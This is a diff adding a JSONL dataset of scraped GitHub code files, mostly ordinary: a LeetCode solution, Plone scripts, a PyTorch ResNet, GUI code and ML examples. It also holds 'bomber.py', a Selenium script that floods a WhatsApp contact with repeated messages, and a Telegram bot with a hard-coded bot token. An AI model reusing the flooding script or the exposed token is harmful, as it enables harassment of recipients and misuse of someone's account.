diff --git "a/2530.jsonl" "b/2530.jsonl" new file mode 100644--- /dev/null +++ "b/2530.jsonl" @@ -0,0 +1,262 @@ +{"seq_id":"73870006615","text":"# https://leetcode.com/problems/special-positions-in-a-binary-matrix/\nfrom typing import List\nimport unittest\n\n__unittest = True\n\n\nclass Solution:\n def numSpecial(self, mat: List[List[int]]) -> int:\n row = [0] * len(mat)\n col = [0] * len(mat[0])\n\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == 1:\n row[i] += 1\n col[j] += 1\n\n cnt = 0\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == 1 and row[i] == 1 and col[j] == 1:\n cnt += 1\n\n return cnt\n\n\nclass Test(unittest.TestCase):\n def helper(self, mat: List[List[int]], want: int):\n solution = Solution()\n got = solution.numSpecial(mat)\n self.assertEqual(got, want)\n\n def test_A1(self):\n self.helper(\n mat=[\n [1, 0, 0],\n [0, 0, 1],\n [1, 0, 0],\n ],\n want=1,\n )\n\n def test_B1(self):\n self.helper(\n mat=[\n [1, 0, 0],\n [0, 1, 0],\n [0, 0, 1],\n ],\n want=3,\n )\n\n def test_C1(self):\n self.helper(\n mat=[\n [1, 0, 1],\n [0, 0, 0],\n [0, 1, 0],\n ],\n want=1,\n )\n\n def test_D1(self):\n self.helper(\n mat=[\n [1, 0, 0, 0],\n [0, 0, 1, 1],\n [1, 0, 0, 0],\n ],\n want=0,\n )\n\n def test_E1(self):\n self.helper(\n mat=[\n [1, 0, 0],\n [0, 0, 1],\n [1, 0, 0],\n [0, 0, 0],\n ],\n want=1,\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"m00p1ng/leetcode","sub_path":"solutions/1582 - Special Positions in a Binary Matrix.py","file_name":"1582 - Special Positions in a Binary Matrix.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27478222589","text":"# -*- coding: utf-8 -*-\n\nimport sys\nfrom imio.pyutils.system import verbose, error\nimport transaction\nfrom plone import api\n\n# Parameters check\nif len(sys.argv) < 3 or sys.argv[2] != 'run-scripts.py':\n error(\"Inconsistent or unexpected args len: %s\" % sys.argv)\n sys.exit(0)\n\n\ndef script2():\n verbose('Updating ports on %s' % obj.absolute_url_path())\n from collective.documentgenerator.utils import update_oo_config\n #from imio.dms.mail.utils import update_solr_config\n #update_solr_config()\n update_oo_config()\n transaction.commit()\n\n\ndef script1():\n verbose('Pst budget correction on %s' % obj.absolute_url_path())\n catalog = obj.portal_catalog\n from imio.project.core.events import onModifyProject\n for brain in catalog(portal_type='projectspace'):\n ps = brain.getObject()\n verbose(ps.absolute_url())\n ret = ps.restrictedTraverse('clean_budget/display')()\n verbose(\"Before: {}\".format(ret.split('
\\n')[0]))\n ps.restrictedTraverse('clean_budget/delete')(empty_budget=False)\n path = brain.getPath()\n pt = ('pstaction', 'operationalobjective', 'strategicobjective')\n for brain in catalog(portal_type=pt, path=path, sort_on='path'):\n onModifyProject(brain.getObject(), None)\n ret = ps.restrictedTraverse('clean_budget/display')()\n verbose(\"After : {}\".format(ret.split('
\\n')[0]))\n transaction.commit()\n\n\ninfo = [\"You can pass following parameters (with the first one always script number):\", \"1: various\"]\n\nscripts = {'1': script1, '2': script2}\n\nif len(sys.argv) < 4 or sys.argv[3] not in scripts:\n error(\"Bad script parameter\")\n verbose('\\n>> =>'.join(info))\n sys.exit(0)\n\nwith api.env.adopt_user(username='admin'):\n scripts[sys.argv[3]]()\n\n### OLD scripts ###\n\n\ndef script1_1():\n verbose('Pst archive migrations on %s' % obj.absolute_url_path())\n from imio.project.pst.interfaces import IImioPSTProject\n from zope.interface import alsoProvides\n # consider modified schema for projectspace\n obj.portal_setup.runImportStepFromProfile('imio.project.core:default', 'typeinfo', run_dependencies=False)\n verbose('Typeinfo updated')\n # set marker interface\n catalog = obj.portal_catalog\n for brain in catalog(portal_type='projectspace'):\n ps = brain.getObject()\n alsoProvides(ps, IImioPSTProject)\n if not ps.budget_years:\n ps.budget_years = [2013, 2014, 2015, 2016, 2017, 2018]\n ps.manage_addLocalRoles(\"pst_editors\", ('Reader', 'Editor', 'Reviewer', 'Contributor', ))\n ps.reindexObject()\n ps.reindexObjectSecurity()\n verbose('Pstproject: marker added, years added, localroles added')\n # add archive action\n obj.portal_setup.runImportStepFromProfile('imio.project.pst:default', 'actions', run_dependencies=False)\n verbose('Actions updated')\n # update dexterity type local roles\n from plone.dexterity.interfaces import IDexterityFTI\n from zope.component import getUtility\n fti = getUtility(IDexterityFTI, name='projectspace')\n lr = getattr(fti, 'localroles')\n lrsc = lr['static_config']\n if 'internally_published' in lrsc and 'pst_editors' in lrsc['internally_published']:\n del(lrsc['internally_published']['pst_editors'])\n lr._p_changed = True\n verbose('Dexterity local roles removed')\n\n\ndef script1_2():\n verbose('Pst migration on %s' % obj.absolute_url_path())\n catalog = obj.portal_catalog\n for brain in catalog(portal_type='projectspace'):\n ps = brain.getObject()\n ps.manage_addLocalRoles(\"pst_editors\", ('Reader', 'Editor', 'Reviewer', 'Contributor', ))\n ps.reindexObject()\n ps.reindexObjectSecurity()\n\n\ndef script1_3():\n verbose('Pst dashboards migration on %s' % obj.absolute_url_path())\n catalog = obj.portal_catalog\n from collective.eeafaceted.collectionwidget.utils import _updateDefaultCollectionFor\n from imio.project.pst import add_path\n for brain in catalog(portal_type='projectspace'):\n ps = brain.getObject()\n if 'operationalobjectives' not in ps:\n continue\n folder = ps['operationalobjectives']\n xmlpath = add_path('faceted_conf/operationalobjective.xml')\n folder.unrestrictedTraverse('@@faceted_exportimport').import_xml(import_file=open(xmlpath))\n _updateDefaultCollectionFor(folder, folder['all'].UID())\n obj.portal_setup.runImportStepFromProfile('imio.project.core:default', 'viewlets', run_dependencies=False)\n transaction.commit()\n","repo_name":"IMIO/server.project","sub_path":"run-scripts.py","file_name":"run-scripts.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31204090545","text":"import torch\nimport torch.nn.functional as F\nimport torch.nn as nn\n\ndef MC_dropout(act_vec, p=0.5, mask=True, inplace=True):\n return F.dropout(act_vec, p=p, training=mask, inplace=inplace)\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, in_planes, planes, stride=1, pdrop=0.1):\n super(BasicBlock, self).__init__()\n self.pdrop = pdrop\n self.conv1 = nn.Conv2d(\n in_planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,\n stride=1, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x, sample=True):\n mask = self.training or sample # if training or sampling, apply random binary mask\n\n out = F.relu(self.bn1(self.conv1(x)))\n out = MC_dropout(out, p=self.pdrop, mask=mask, inplace=False)\n out = self.bn2(self.conv2(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_planes, planes, stride=1, pdrop=0.1):\n super(Bottleneck, self).__init__()\n self.pdrop = pdrop\n self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3,\n stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes)\n self.conv3 = nn.Conv2d(planes, self.expansion *\n planes, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(self.expansion*planes)\n\n self.shortcut = nn.Sequential()\n if stride != 1 or in_planes != self.expansion*planes:\n self.shortcut = nn.Sequential(\n nn.Conv2d(in_planes, self.expansion*planes,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(self.expansion*planes)\n )\n\n def forward(self, x, sample=True):\n mask = self.training or sample # if training or sampling, apply random binary mask\n\n out = F.relu(self.bn1(self.conv1(x)))\n out = MC_dropout(out, p=self.pdrop, mask=mask, inplace=False)\n out = F.relu(self.bn2(self.conv2(out)))\n out = MC_dropout(out, p=self.pdrop, mask=mask, inplace=False)\n out = self.bn3(self.conv3(out))\n out += self.shortcut(x)\n out = F.relu(out)\n return out\n\nclass ResNet(nn.Module):\n def __init__(self, block, num_blocks, num_classes=10, input_size=32, pdrop=0.1):\n super(ResNet, self).__init__()\n self.in_planes = 64\n self.pdrop = pdrop\n self.out_channels = num_classes\n \n #adapt first conv layer to image size\n if input_size > 32:\n self.conv1 = nn.Conv2d(3, 64, kernel_size=5, stride=1, padding=3, bias=False)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n else: #classic cifar10 case\n self.conv1 = nn.Conv2d(3, 64, kernel_size=3, stride=1, padding=1, bias=False)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=1, padding=1)\n self.bn1 = nn.BatchNorm2d(64)\n self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)\n self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)\n self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)\n self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)\n self.linear = nn.Linear(512*block.expansion, num_classes)\n\n def _make_layer(self, block, planes, num_blocks, stride):\n strides = [stride] + [1]*(num_blocks-1)\n layers = []\n for stride in strides:\n layers.append(block(self.in_planes, planes, stride, self.pdrop))\n self.in_planes = planes * block.expansion\n return nn.Sequential(*layers)\n\n def forward(self, x, sample=True):\n out = F.relu(self.bn1(self.conv1(x)))\n out = self.maxpool(out) #added to adapt to input sizes\n out = self.layer1(out)\n out = self.layer2(out)\n out = self.layer3(out)\n out = self.layer4(out)\n out = F.avg_pool2d(out, 4)\n out = out.view(out.size(0), -1)\n out = self.linear(out)\n return out\n \n def sample_predict(self, x, Nsamples):\n # Just copies type from x, initializes new vector\n logits = x.data.new(Nsamples, x.shape[0], self.out_channels)\n\n for i in range(Nsamples):\n y = self.forward(x, sample=True)\n logits[i] = y\n\n return logits\n\ndef ResNet34(num_classes, input_size, pdrop):\n return ResNet(BasicBlock, [3, 4, 6, 3], num_classes, input_size, pdrop)\n\ndef ResNet50(num_classes, input_size, pdrop):\n return ResNet(Bottleneck, [3, 4, 6, 3], num_classes, input_size, pdrop)","repo_name":"theresabruns/UncertaintyEstimation","sub_path":"MCDropout/src/MC_dropout/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":5272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14243264005","text":"from taipy.gui import Gui, State, broadcast_callback\nfrom threading import Thread, Event\nfrom time import sleep\n\ncounter = 0\n\n# Thread management\nthread = None\nthread_event = Event()\ntimer_status = \"Timer stopped\"\n\nclient_index = 1\nuser_name = \"\"\nbutton_texts = [\"Start\", \"Stop\"]\n# Text in the start/stop button (initially \"Start\")\nbutton_text = button_texts[0]\n\n\ndef on_init(state: State):\n global client_index\n state.user_name = f\"Client_{client_index}\"\n client_index = client_index+1\n\n# Invoked by the timer\ndef update_counter(state: State, c):\n # Update all clients\n state.broadcast(\"counter\", c)\n\ndef count(event, gui):\n while not event.is_set():\n global counter\n counter = counter + 1\n broadcast_callback(gui, update_counter, [counter])\n sleep(2)\n\n\n# Start or stop the timer when the button is pressed\ndef start_or_stop(state):\n status = \"\"\n global thread\n if thread: # Timer is running\n thread_event.set()\n thread = None\n status = \"stopped\"\n else: # Timer is stopped\n thread_event.clear()\n thread = Thread(target=count, args=[thread_event, state.get_gui()])\n thread.start()\n status = \"started\"\n # Update statuses.\n with state:\n state.broadcast(\"timer_status\", f\"Timer {status} by {state.user_name}\")\n state.timer_status = f\"You {status} the timer\"\n state.button_text = button_texts[1 if thread else 0]\n\n\npage = \"\"\"# Broadcasting values\n\nUser name: <|{user_name}|input|>\n\n<|{timer_status}|>\n\nCounter: <|{counter}|>\n\nTimer: <|{button_text}|button|on_action=start_or_stop|>\n\"\"\"\n\n# Declare \"button_text\" as a shared variable.\n# Assigning a value to a state's 'button_text' property is propagated to all clients\nGui.add_shared_variable(\"button_text\")\n\nGui(page).run()\n","repo_name":"FlorianJacta/basic-demo","sub_path":"gui/advanced_features/broadcast.py","file_name":"broadcast.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28637163360","text":"from transliterate import to_cyrillic, to_latin\nimport telebot\n\nbot = telebot.TeleBot(\"2070189183:AAF7vhot4tA71lQ0qdU1Z9IkNpiOrxGtk9U\", parse_mode=None)\n\n@bot.message_handler(commands=['start'])\ndef send_welcome(message):\n bot.reply_to(message, \"Matn kiriting \")\n\n@bot.message_handler(func=lambda message: True)\ndef echo_all(message):\n msg = message.text\n javob = lambda msg: to_cyrillic(msg) if msg.isascii() else to_latin(msg)\n bot.reply_to(message, javob(msg))\n\nbot.polling()\n\nmatn = input(\">>>\")\n","repo_name":"bakhritdinov99/python-javoblar","sub_path":"27-dars. Kirill-Lotin bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29679602923","text":"import os.path\nimport os.path\nimport sys\nfrom abc import abstractmethod\nfrom typing import List\n\nfrom PyQt5.QtCore import Qt, QSize\nfrom PyQt5.QtWidgets import QLabel, QPushButton, QVBoxLayout, QStackedWidget, QToolButton, QListWidget, QApplication, \\\n QHBoxLayout\n\nfrom bean.beans import SocialConfig, AppTypeToName\nfrom util import log, app_download_info\nfrom util.tools import UITool\nfrom widget.base_widget import BaseWidget\nfrom widget.custom_msgbox import CustomMsgBox\nfrom widget.layout_widget import HBoxLayoutWidget, VBoxLayoutWidget\n\n\nclass BaseSettingsWidget(BaseWidget):\n def __init__(self):\n from settings.settings_controller import SettingsController\n super(BaseSettingsWidget, self).__init__()\n self.controller = SettingsController(self)\n\n @abstractmethod\n def __initView(self):\n pass\n\n @abstractmethod\n def __getQss(self) -> [dict, None]:\n pass\n\n def showOnFilePathChange(self, path: str, typ: int):\n log.i(path, typ)\n CustomMsgBox.showToast(\"修改成功\")\n\n\nclass SettingsWidget(BaseSettingsWidget):\n def __init__(self):\n super(SettingsWidget, self).__init__()\n\n self.labelTitle = QLabel(\"系统设置\")\n self.btnClose = QPushButton()\n\n self.btnCommonSettings = QPushButton(\"通用配置\")\n self.btnSocialSettings = QPushButton(\"社交平台配置\")\n self.btnSettingsList = [self.btnCommonSettings, self.btnSocialSettings]\n\n self.stackedWidget = QStackedWidget()\n\n self.__initView()\n\n self.__onPageBtnClicked(0)\n\n def __getQss(self) -> [dict, None]:\n qssBtn = \"QPushButton {font-size:17px; \" \\\n \"color:#636b71; \" \\\n \"border:none;background-color:transparent;\" \\\n \"text-align:left; \" \\\n \"padding-left:15px }\" \\\n \"QPushButton:checked {background-color:#d8eaf6; border:0px; border-left:2px solid #007bff; }\"\n return {self: \"background-color:#f4f4f6\",\n self.labelTitle: \"font-size:20px\",\n self.btnClose: \"border:none\",\n self.btnCommonSettings: qssBtn,\n self.btnSocialSettings: qssBtn}\n\n def __initView(self):\n UITool.setQss(self.__getQss())\n vBoxRoot = UITool.getLayout(QVBoxLayout(), self)\n self.btnClose.setIcon(UITool.getQIcon(\":/ic_close_gray\", 16, 16))\n self.btnClose.setFixedSize(25, 25)\n\n UITool.setCursor(Qt.PointingHandCursor, self.btnClose, self.btnCommonSettings, self.btnSocialSettings)\n\n for i, btn in enumerate(self.btnSettingsList):\n btn.setFixedSize(165, 45)\n btn.setCheckable(True)\n btn.clicked.connect(lambda state, idx=i: (self.__onPageBtnClicked(idx)))\n\n widgetTitle = HBoxLayoutWidget(margins=(35, 0, 35, 0))\n widgetTitle.layout.addWidget(self.labelTitle)\n widgetTitle.layout.addStretch(1)\n widgetTitle.layout.addWidget(self.btnClose)\n widgetTitle.setFixedHeight(55)\n\n widgetBtn = VBoxLayoutWidget(spacing=15, margins=(0, 30, 25, 0))\n widgetBtn.layout.addWidget(self.btnCommonSettings)\n widgetBtn.layout.addWidget(self.btnSocialSettings)\n widgetBtn.layout.addStretch(1)\n\n widgetContent = HBoxLayoutWidget(margins=(35, 0, 35, 0))\n widgetContent.layout.addWidget(widgetBtn)\n widgetContent.layout.addWidget(UITool.getLineFrame(1, \"#d6d6d8\", False))\n widgetContent.layout.addWidget(self.stackedWidget, 1)\n\n self.stackedWidget.setContentsMargins(30, 30, 30, 30)\n self.stackedWidget.addWidget(CommonSettingsWidget())\n self.stackedWidget.addWidget(SocialSettingsWidget())\n\n vBoxRoot.addWidget(widgetTitle)\n vBoxRoot.addWidget(UITool.getLineFrame(1, \"#d6d6d8\"))\n vBoxRoot.addWidget(widgetContent)\n\n def __onPageBtnClicked(self, index: int):\n for btn in self.btnSettingsList:\n btn.setChecked(False)\n\n self.btnSettingsList[index].setChecked(True)\n self.stackedWidget.setCurrentIndex(index)\n\n\nclass CommonSettingsWidget(BaseSettingsWidget):\n def __init__(self):\n super(CommonSettingsWidget, self).__init__()\n\n self.vBoxRoot: QVBoxLayout = UITool.getLayout(QVBoxLayout(), self, spacing=20)\n self.labelFileStorage = QLabel(\"文件存储\")\n self.labelFilePath = QLabel()\n self.labelDes = QLabel(\"文件默认保存位置\")\n self.btnChange = QPushButton(\"更改\")\n\n self.__initView()\n\n def __getQss(self) -> [dict, None]:\n return {self.labelFileStorage: \"font-size:18px;\",\n self.labelFilePath: \"color:#c0c0c0;\"\n \"border:none;\"\n \"border-bottom:2px solid #b5b5b6;\"\n \"padding-bottom:8px;\"\n \"font-size:18px \",\n self.labelDes: \"color:#c0c0c0; font-size:18px\",\n self.btnChange: \"background-color:#ffffff; \"\n \"border: 1px solid #b5b5b6; \"\n \"border-radius:5px;\"\n \"font-size:15px\"}\n\n def __initView(self):\n UITool.setQss(self.__getQss())\n self.btnChange.setFixedSize(70, 30)\n self.btnChange.clicked.connect(lambda: self.controller.changeFilePath(SocialConfig.DEFAULT))\n\n self.showOnFilePathChange(self.controller.getDefaultFilePath(), SocialConfig.DEFAULT)\n\n self.vBoxRoot.addWidget(self.labelFileStorage)\n self.vBoxRoot.addWidget(self.labelFilePath)\n self.vBoxRoot.addWidget(self.labelDes)\n self.vBoxRoot.addWidget(self.btnChange)\n self.vBoxRoot.addStretch(1)\n\n def showOnFilePathChange(self, path: str, typ: int):\n self.labelFilePath.setText(os.path.expandvars(path))\n\n\nclass SocialSettingsWidget(BaseSettingsWidget):\n def __init__(self):\n super(SocialSettingsWidget, self).__init__()\n self.labelTitle = QLabel(\"平台列表\")\n self.descriptionLabel: QLabel = QLabel()\n self.settings: List[SocialConfig]\n self.__initView()\n\n def __getQss(self) -> [dict, None]:\n return {self: \"QLabel {color:#687176; font-size:20px}\"\n \"QListWidget {background-color:transparent;border:none}\"\n \"QLabel#descriptionLabel {font-size:16px}\"}\n\n def __initView(self):\n UITool.setQss(self.__getQss())\n\n vBox: QVBoxLayout = UITool.getLayout(QVBoxLayout(), self, spacing=20)\n listPlatform: QListWidget = QListWidget()\n self.descriptionLabel.setObjectName(\"descriptionLabel\")\n\n self.settings = self.controller.getSettings()\n\n for i in range(len(self.settings) + 1):\n UITool.addListItem(listPlatform,\n SettingItemWidget(None if i == 0 else self.settings[i - 1], self.controller),\n 40 if i == 0 else 50)\n\n self.__refreshDescriptions()\n\n vBox.addWidget(self.labelTitle)\n vBox.addWidget(listPlatform)\n vBox.addWidget(self.descriptionLabel)\n\n def __refreshDescriptions(self):\n text = \"存储路径: \\n\"\n for socialConfig in self.settings:\n text += f\"{AppTypeToName[socialConfig.type]}: \" \\\n f\"{'默认' if len(socialConfig.path) == 0 else socialConfig.path}\\n\"\n text += \"\\n\"\n text += app_download_info.getDescription()\n self.descriptionLabel.setText(text)\n\n def showOnFilePathChange(self, path: str, typ: int):\n self.settings[typ].path = path\n self.__refreshDescriptions()\n\n\nclass SettingItemWidget(BaseWidget):\n def __init__(self, config: SocialConfig, controller):\n from settings.settings_controller import SettingsController\n super(SettingItemWidget, self).__init__()\n self.controller: SettingsController = controller\n self.btnName = QToolButton()\n self.btnStatus = QToolButton()\n self.btnEdit = QPushButton()\n self.labelVersion = QLabel()\n\n self.labelList = []\n\n self.widgetHBox: QHBoxLayout = UITool.getLayout(QHBoxLayout(), self)\n\n self.config = config\n self.__initView()\n\n def __getQss(self) -> [dict, None]:\n return {self: \"QWidget {border-bottom: 1px solid #e1e5ed }\"\n \"QLabel {font-size: 18px }\"\n \"QAbstractButton {border: none;font-size:15px},\",\n self.btnStatus: \"color:#999999;\",\n self.labelVersion: \"background-color:transparent\"}\n\n def __initView(self):\n UITool.setQss(self.__getQss())\n\n if self.config is None:\n widgetList = [QLabel(\"平台名称\"), QLabel(\"状态\"), QLabel(\"存储路径\"), QLabel(\"支持版本\")]\n self.labelList = widgetList\n self.setStyleSheet(\"background-color:#dde3ed; font-size:16px\")\n else:\n nameList = [\"企业微信\", \"微信\", \"QQ\"]\n iconList = [\":/ic_buswechat.png\", \":/ic_wechat.png\", \":/ic_qq.png\"]\n\n self.btnName.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)\n self.btnStatus.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)\n\n UITool.setButtonStyle(self.btnName, QSize(90, 20), text=nameList[self.config.type],\n icon=UITool.getQIcon(iconList[self.config.type], 25, 25))\n\n status = self.config.status\n iconPath = \":/ic_running.png\" if status else \":/ic_not_running.png\"\n UITool.setButtonStyle(self.btnStatus, QSize(70, 20), text=\"已授权\" if status else \"未授权\",\n icon=UITool.getQIcon(iconPath, 10, 10))\n\n self.btnEdit.setIcon(UITool.getQIcon(\":/ic_edit.png\", 16, 16))\n self.btnEdit.clicked.connect(lambda: self.controller.changeFilePath(self.config.type))\n UITool.setCursor(Qt.PointingHandCursor, self.btnEdit, self.labelVersion)\n self.labelVersion.setText(str(self.config.versions))\n self.labelVersion.setOpenExternalLinks(True)\n\n widgetList = [self.btnName, self.btnStatus, self.btnEdit, self.labelVersion]\n\n self.widgetHBox.addWidget(widgetList[0], 150, Qt.AlignCenter)\n lineColor = \"#c2d4e6\" if self.config is None else \"#e1e5ed\"\n self.widgetHBox.addWidget(UITool.getLineFrame(2, lineColor, False))\n self.widgetHBox.addWidget(widgetList[1], 115, Qt.AlignCenter)\n self.widgetHBox.addWidget(UITool.getLineFrame(2, lineColor, False))\n self.widgetHBox.addWidget(widgetList[2], 95, Qt.AlignCenter)\n self.widgetHBox.addWidget(UITool.getLineFrame(2, lineColor, False))\n self.widgetHBox.addWidget(widgetList[3], 270, Qt.AlignCenter)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n w = SettingsWidget()\n w.resize(900, 600)\n w.show()\n\n sys.exit(app.exec_())\n","repo_name":"SailFlorve/DataCollectQt","sub_path":"settings/settings_ui.py","file_name":"settings_ui.py","file_ext":"py","file_size_in_byte":10881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14439429505","text":"# Jordan Leung\r\n# 2/13/2019\r\n\r\n# 5-8 Hello Admin\r\nusernames = ['jjleung', 'nubcake', 'jordanjj8', 'jordanl', 'jjleung88']\r\n#usernames = []\r\n\r\nif usernames:\r\n for username in usernames:\r\n if username == 'jjleung':\r\n print(\"Hello Student, would you like to see your grades?\")\r\n else:\r\n print(\"Hello boob, you have entered old usernames that Jordan used to use...\")\r\nelse:\r\n print(\"Please type in usernames! \")\r\n\r\n\r\n# 5-10 checking new usernames\r\ncurrent_users = usernames[:]\r\nnew_users = ['hello', 'singer_babe', 'jordanl', 'guitar_lover', 'jjleung']\r\n\r\nfor user in new_users:\r\n if user in current_users:\r\n print(\"Please replace \" + user + \" and add a new username\")\r\n else:\r\n print(\"Adding username \" + user + \" to the list\")\r\n\r\n\r\n","repo_name":"jordanjj8/exercising_with_python","sub_path":"IF.py","file_name":"IF.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26117381246","text":"import numpy as np\ndata_file = open('out_rep.txt')\ndata_file1 = open('out_UserId.txt')\ndata_rep = data_file.readlines()\ndata_user = data_file1.readlines()\nfor i in range(len(data_rep)) :\n data_rep[i] = list(map(int, data_rep[i].split()))\nfor j in range(len(data_user)):\n data_user[j] = list(map(int, data_user[j].split()))\n\nrep=[]\nnoans=[]\n\nfor i in range(0,len(data_user)):\n for j in range(0,len(data_rep)):\n if data_user[i][0]==data_rep[j][0]:\n rep.append(data_rep[j][1])\n noans.append(data_user[i][1])\n\ncorr=np.corrcoef(rep,noans)\nprint('The correlation coefficient is:',corr[0][1])\n\n\n","repo_name":"HS1VT/datascience.stackexchange-data-analysis","sub_path":"Part5/q5.py","file_name":"q5.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3568690211","text":"import sklearn\nfrom sklearn import datasets, svm, metrics\nfrom sklearn.neighbors import KNeighborsClassifier\n\n\n# sklearn dataset\ncancer = datasets.load_breast_cancer()\n\n# features and targets\n#print(cancer.feature_names)\n#print(cancer.target_names)\n\nX = cancer.data\nY = cancer.target\n\nx_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(X, Y, test_size=0.2)\n\n# for making results more readable, i.e. 0, 1 to malignant, benign\nclasses = ['malignant', 'benign']\n\n# creates classifier (support vector classifier) with a linear kernel and an increased soft margin\nclf = svm.SVC(kernel=\"linear\", C=2)\nclf.fit(x_train, y_train)\n\n# calculates predictions from test data\ny_pred = clf.predict(x_test)\n\n# calculates accuracy of model\nacc = metrics.accuracy_score(y_test, y_pred)\n\nprint(acc)\n\n# compares predictions and actual data\nfor x in range(len(y_pred)):\n print(\"Predicted: \", classes[y_pred[x]], \"Actual:\", classes[y_test[x]])\n","repo_name":"gercokim/ml_basics","sub_path":"SVM/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"11909500704","text":"from selenium import webdriver\n\ndriver = webdriver.Chrome(\"/chromedriver\") # Windows User change path here.\ndriver.get('http://web.whatsapp.com')\n\nname = \" \" # Enter Your Name or Group\nmsg = \" \"# Message in whatsapp to send\ncount = 100 # count Number\n\n\ninput('Enter anything after scanning QR code')\n\nuser = driver.find_element_by_xpath('//span[@title = \"{}\"]'.format(name))\nuser.click()\n\nmsg_box = driver.find_element_by_class_name('_1Plpp')\n\nfor i in range(count):\n msg_box.send_keys(msg)\n driver.find_element_by_class_name('_35EW6').click()\n\n","repo_name":"ranjitkathiriya/Whatsapp_Bomber","sub_path":"bomber.py","file_name":"bomber.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14429672806","text":"import yaml\nimport datetime\nimport random\nimport time\nfrom pathlib import Path\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom util.engine import train_one_epoch, valid_one_epoch\nfrom models.detr import build\nfrom util.dataset import selfDataset, collateFunction\n\n\ndef main(cfg):\n device = torch.device(cfg['device'])\n\n # fix the seed for reproducibility\n seed = cfg['seed']\n torch.manual_seed(seed)\n np.random.seed(seed)\n random.seed(seed)\n\n model, criterion = build(cfg)\n model.to(device)\n\n n_parameters = sum(p.numel()\n for p in model.parameters() if p.requires_grad)\n print('number of params:', n_parameters)\n\n param_dicts = [\n {\"params\": [p for n, p in model.named_parameters(\n ) if \"backbone\" not in n and p.requires_grad]},\n {\n \"params\": [p for n, p in model.named_parameters() if \"backbone\" in n and p.requires_grad],\n \"lr\": cfg['lr_backbone'],\n },\n ]\n optimizer = torch.optim.AdamW(param_dicts, lr=cfg['lr'],\n weight_decay=cfg['weight_decay'])\n lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, cfg['lr_drop'])\n\n # load data\n dataset = selfDataset(\n cfg['train_dir'], cfg['scaled_width'], cfg['scaled_height'], cfg['num_class'])\n dataLoader = DataLoader(dataset, batch_size=cfg['batch_size'], shuffle=True, collate_fn=collateFunction,\n pin_memory=True, num_workers=cfg['num_workers'])\n dataset_val = selfDataset(\n cfg['val_dir'], cfg['scaled_width'], cfg['scaled_height'], cfg['num_class'])\n dataLoader_val = DataLoader(dataset_val, batch_size=cfg['batch_size'], shuffle=True, collate_fn=collateFunction,\n pin_memory=True, num_workers=cfg['num_workers'])\n # steps = int(dataset.__len__() / cfg['batch_size'])\n\n if cfg['frozen_weights'] is not None:\n checkpoint = torch.load(cfg['frozen_weights'], map_location='cpu')\n model.detr.load_state_dict(checkpoint['model'])\n\n output_dir = Path(cfg['output_dir'])\n\n if cfg['resume']:\n checkpoint = torch.load(cfg['resume'], map_location='cuda')\n model.load_state_dict(checkpoint['model'])\n\n if 'optimizer' in checkpoint and 'lr_scheduler' in checkpoint and 'epoch' in checkpoint:\n optimizer.load_state_dict(checkpoint['optimizer'])\n lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])\n cfg['start_epoch'] = checkpoint['epoch'] + 1\n\n print(\"Start training\")\n start_time = time.time()\n for epoch in range(cfg['start_epoch'], cfg['epochs']):\n loss_train = 